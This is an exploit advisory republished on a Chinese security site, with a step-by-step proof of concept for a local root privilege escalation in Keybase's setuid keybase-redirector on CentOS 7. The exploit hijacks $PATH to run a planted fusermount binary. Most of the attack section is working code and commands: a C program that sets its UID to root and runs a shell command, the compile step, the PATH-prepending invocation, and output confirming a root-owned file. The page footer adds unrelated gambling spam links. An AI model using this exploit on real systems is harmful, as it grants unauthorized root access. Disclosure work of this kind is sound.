首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>Exploits>文章內容
Keybase keybase-redirector - '$PATH' Local Privilege Escalation
來源:vfocus.net 作者:mirchr 發布時間:2018-12-25  

keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root.

## Environment

CentOS Linux release 7.4.1708 (Core)
3.10.0-693.17.1.el7.x86_64

RPM info

```
Name        : keybase
Version     : 2.8.0.20181017144746.3efc4cbf3c
Release     : 1
Architecture: x86_64
Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
Group       : Unspecified
Size        : 273302678
License     : BSD
Signature   : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
Source RPM  : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
Build Date  : Wed 17 Oct 2018 10:54:47 AM EDT
Build Host  : 6ae61e160e87
Relocations : (not relocatable)
Summary     : Keybase command line client
Description :
Keybase command line client
```

An unprivileged user named user1 is used for this PoC.

## Steps to reproduce

1) Display privileges of user 1 - execute the id command

```
[[email protected] woot]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```

2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.

```
cat >fusermount.c<<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv)
{
  setreuid(0,0);
  system("/usr/bin/touch /w00t");
  return(0);
}
EOF
``

3) Compile fusermount.c

```
gcc -Wall fusermount.c -o fusermount
```

4) Verify that /w00t does not exist.

```
[[email protected] woot]$ ls -ld /w00t
ls: cannot access /w00t: No such file or directory
```

5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.

```
env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
```

6) Enter the control-c sequence to kill the application.

```
[[email protected] woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
^C
```

7) Verify that /w00t exists

```
[[email protected] woot]$ ls -ld /w00t
-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
[[email protected] woot]$
```

## Impact

Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system.


 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相關文章
·Google Chrome 70 - SQLite Mage
·Netatalk - Bypass Authenticati
·phpMyAdmin 4.8.4 - 'AllowArbit
·Kubernetes - (Unauthenticated)
·ATool 1.0.0.22 Buffer Overflow
·Kubernetes - (Authenticated) A
·SQLScan 1.0 Denial Of Service
·Microsoft Edge 42.17134.1.0 De
·AnyBurn 4.3 Local Buffer Overf
·Angry IP Scanner 3.5.3 Denial
·GIGABYTE Driver Privilege Esca
·ASUS Driver Privilege Escalati
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
北京单场4串1是什么意思 pk10牛牛真的假的 大嘴大嘴棋牌下载 怎么看股票数据熔断 吉祥游戏手机版官网 11选5定一胆百分之98准 线上股票配资选哪家 幸运赛车10选6技巧 浙江20选5精准预测 最新网络捕鱼平台 宝博棋牌官网下载苹果